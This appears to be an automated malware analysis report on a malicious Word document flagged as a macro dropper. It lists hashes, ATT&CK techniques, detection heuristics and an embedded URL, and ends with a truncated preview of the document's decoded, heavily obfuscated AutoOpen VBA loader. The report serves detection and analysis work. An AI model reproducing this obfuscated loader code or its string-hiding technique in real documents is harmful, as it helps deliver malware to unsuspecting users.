Office (OLE) malware analysis — malicious · 5360451f2d59c9e3

MALICIOUS

Office (OLE)

175.5 KB Created: 2017-11-23 04:43:00 Authoring application: Microsoft Office Word First seen: 2017-11-29

MD5: 3b50a57e8340dfc3da02fe7933cee7f0 SHA-1: 52e236ea6af50e2b924d8535c75e0aae2f7afd96 SHA-256: 5360451f2d59c9e3374010fe44b462051c9f5fc9f856ddaab1c2416bca545e2a

304 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate

The file contains a VBA macro with an AutoOpen function, which is a common loader for malicious documents. The macro is heavily obfuscated and uses Shell() calls, indicating it's designed to execute arbitrary code. The ClamAV signature 'Doc.Dropper.Agent-6381297-0' and the presence of an embedded URL suggest the primary purpose is to download and run a secondary payload.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6381297-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6381297-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www271+271.heineken.iNBT+N In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	207661 bytes
SHA-256: `923ceb4cd9c1647c2f2912102489ad7a5c3424f652221ca8a992826d9a5ce05a`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 104 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "KIjMwdfGB" Function YrKIhDfAR() rFvYPaW = "rq5u0Mu7RVlhqji7FGFRurkzaGaLTBYdcNSOulmGNLjABQXSSWNGWon0RAPqM0duqh" Dmvwu = Array("wrwSPEjw", "kdwOfdZs", "JBEitkWo", "AuZwPnuC", "kCbTlTMI", "aGkrKzLa", "GPLWvncO", "UHSVfkjz") XawXf = Mid(rFvYPaW, 25, 27) jBWXOKXMUKX = Array("vGPiRBSG", "TEjtjAhN", "TuvBQECj", "awdRowGs", "zNldiXJS", "CBZZKhmc", "NKCVVJNq", "DfIVYARW") pFsjq = "WNqdupjKutDqzlATDtvVkYFJCDjwhqKcZpuMQckDiwtTtVzKCPlioCYGPOLPFidEibRIqnDaIsqmimPjEYvSFcnWQozCRVzwUpkSDqUPMLavMmbdwiKjmLzGnvrCqAImutRoBwcNEjGtBsJiMTDnLRJIqdfIzRYLDoBSUmcBBzbGaTdEBiGcwvSJEikKbjwKjvadH79kq" EhkKtK = Array("zLZEarIt", "rkuUmwCC", "bsVNswDZ", "uJFHKsbz", "PTCiqRHb", "JzGsMWkS", "RqwvUIwB", "IzKQlBjw") wMvOD = Mid(pFsjq, 6, 167) IOjANqfhn = Array("SNNLWOiB", "ZrrFpHNk", "zJziFvzs", "Szaofktf", "jlhVbDSP", "nkIAqPVh", "TSrzcGrX", "PUtZopVo") fHnqkBnIYTl = "0rLEiQhAVEa9fSHLlRLJPldiQZNaaNEUbBtNsJjYdKandqEmWXtGIdcrcvvoAZCbimvbNVSbimjFKqBaVbECUzMzZBlzOvYEIwFqucZBFRYWzXjmtUSZVzHkawCLjVNmNbwMlKftCDzCZpzBUzDtcziIqUQwZNRjElIVbUBipZWRBFKkwBrkRTKOsnVQujTolNzojdazwUEDcRHlKjzXVjWwH1l" IvNCmchwmwE = Array("CkVGftBJ", "DPqSHfcI", "wdTuaSoD", "VKHnDAko", "tBOnbAlD", "ZvXCraFV", "FTWZWtIk", "vRkVmOFD") WzVHUrFHi = Mid(fHnqkBnIYTl, 16, 199) GDKtTOzWP = Array("DwjhbwHI", "OvrGWCBV", "oZDUArvz", "FFvRUftG", "lPWIUfVo", "ihkQXwHR", "zaFbShtM", "AhcVDqoj") FfPCB = "8wdsuzUjniBzIQ2FqEEKXcEizYLfiBjbRZmXzlzUHQMlYtcoWSPpiVALjXqOCArQIswFQTvTrOMGPzHNucfQmrzwYbqculRGZvdjvWYCWvwPIuviQdTaVbiRuBhpdTYFzGhUUaSXDctqshoifHLRSrlzRLltpjZCWsSCNbOpKvWshnYNNCJVHHnGUjCJpZiUDrUAPmQDtVGWVsQdmYfnaDvPELhiZFAlNC81hD7" ZadpTvUQSu = Array("zfPZEMWZ", "mTdrwRsb", "OfijRCwh", "dYjVjkSf", "mAOvEPUl", "iZdzikkN", "bEvmlmAw", "iiwjdApC") qONnBPjETMM = Mid(FfPCB, 29, 198) CfliiUNEwqK = Array("zKoaOWtG", "iSvFiLbN", "ohDaAQfT", "uDEckQSQ", "pFGOqPvj", "wJSNaTpZ", "zAzPTIbi", "fUfKRQWR") qEVLzUmAiaw = "GY6rK2QoUHFrMkWLfmUmYBrCqXmiKpobUOWcFvLiOXnAhdrVnGiGpaRHTXYsQidiSdXwNuGkamYBNqVNjRuEKiltwPIiWSRftJiDFsHsAufDBQtdBLMznZTksdCzmXNIUtIEISHnJBDQCirjWihKGSrTpzLbqJGcjWjIHoViEYpmVDhJmVbIqCCBBoOKHfwzvbmfBWfCjHBI6oBIjT088O3j" tioEBbaEQoa = Array("WSbzuOqU", "phaFEfNs", "KZrjjiVC", "jVwSoNOE", "cJUtuSIV", "RXUcoTja", "UrNUuhGo", "zYSYQXfb") ZcVvTrlfAkI = Mid(qEVLzUmAiaw, 7, 188) HTZKRjXzIB = Array("lcHwzWNB", "LPwsEBTr", "tbqQwAWZ", "NbcbnYsf", "RFGEAZlI", "pqwrLVRC", "kHsKKOZl", "GikXtlNm") kZGzs = "1wT7FFFulNqWwVbdkJwXQUOnHuqMqrJZrClNpDDlYkWmbCOhNYiLoFljjoOhwvYv54bOGiYwC9F4biSfB1uuSwUn8" dpZiGfqp = Array("XoCXdjWA", "WuJTaujV", "EhDFMtwc", "mDvcCWbW", "WOCptJvY", "RYLYqOdG", "ZhtHJEKi", "rZkaktwz") Nqktq = Mid(kZGzs, 5, 54) wMNFESYEZ = Array("QVPUjvWD", "HwEfrlcE", "FrKtzLUK", "RkGItkaP", "cUIwiFVP", "kjladwjZ", "EnYhTzhE", "AFCwoNJW") dAjzaMaVaDW = "3UWkCc17h7uk22hMHPcKhDzFNVzDYvLiCzaUiXipmjEjuwvKrcmLQbTQOLXLpHIUraZAUCijlnXzzTKRZnMvIzOadKGXASzfajpUXvqowDadEWRuBGmCuNLrMzWKwHiSnsWPiptizXwFZkWHsLWtjzkNXzHXZjsrUHpLzBQLMIEXRGRbcORklpmpIJsjiVERfFkRvKIruKhXsNwQj7HhBMBuU2uD1VY" IUbOKYvH = Array("fUBuuCYz", "bbGaYNlv", "FmOjAZTT", "HqSstqAq", "wnprrFzY", "CtoBCWYU", "flGRCOjF", "BhnEjfGl") VotXQkoh = Mid(dAjzaMaVaDW, 16, 194) LdUcvOB = Array("qPNWSiFH", "aVQdwiCh", "adjMTtiz", "oGipJupv", "cEnAIaCE", "GtUUMtAr", "aatPcJwz", "hQhMEQzj") MKPwQtSYtrU = "8obiMRwtDcMXMSIKPTAZjEiQWEXphllAWtFIKwzvUtrOQHRXMHhDCYEE7s2kuIitv" nQPiY = Array("skDbOcZc", "PGHwUKNd", "wJzKhkoJ", "oRQcGjSM", "nqzqVJmT", "ZwhtIubv", "RCNJzLLI", "vtnzLwVi") cEhDA = Mid(MKPwQtSYtrU, 5, 48) TDjidGYr = Array("zKSisisi", "BaYdGbAj", "OGtQFEDn", "BiKvIIho", "ZfMXHmqm", "JIjsaYlA", "wwazAPrv", "GfjKTzVt") ElpVrM = "KpFikJTwBEqLHPE5vYTwlPJiYcEzMtvaaOSdRVoBJXcciwobXiMGKXQjJPwWMpHwanDjloJpiasJIrNNUfNpXnQDzlUCZRpTQfCrvFqjUWcjfGXRBnpN" mapbbws = Array("wvjSCjjm", "jisTLTBN", "TuVDljQV", "DozWfAqc", "UnZNmphz", "LtCOuhuz", "v ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.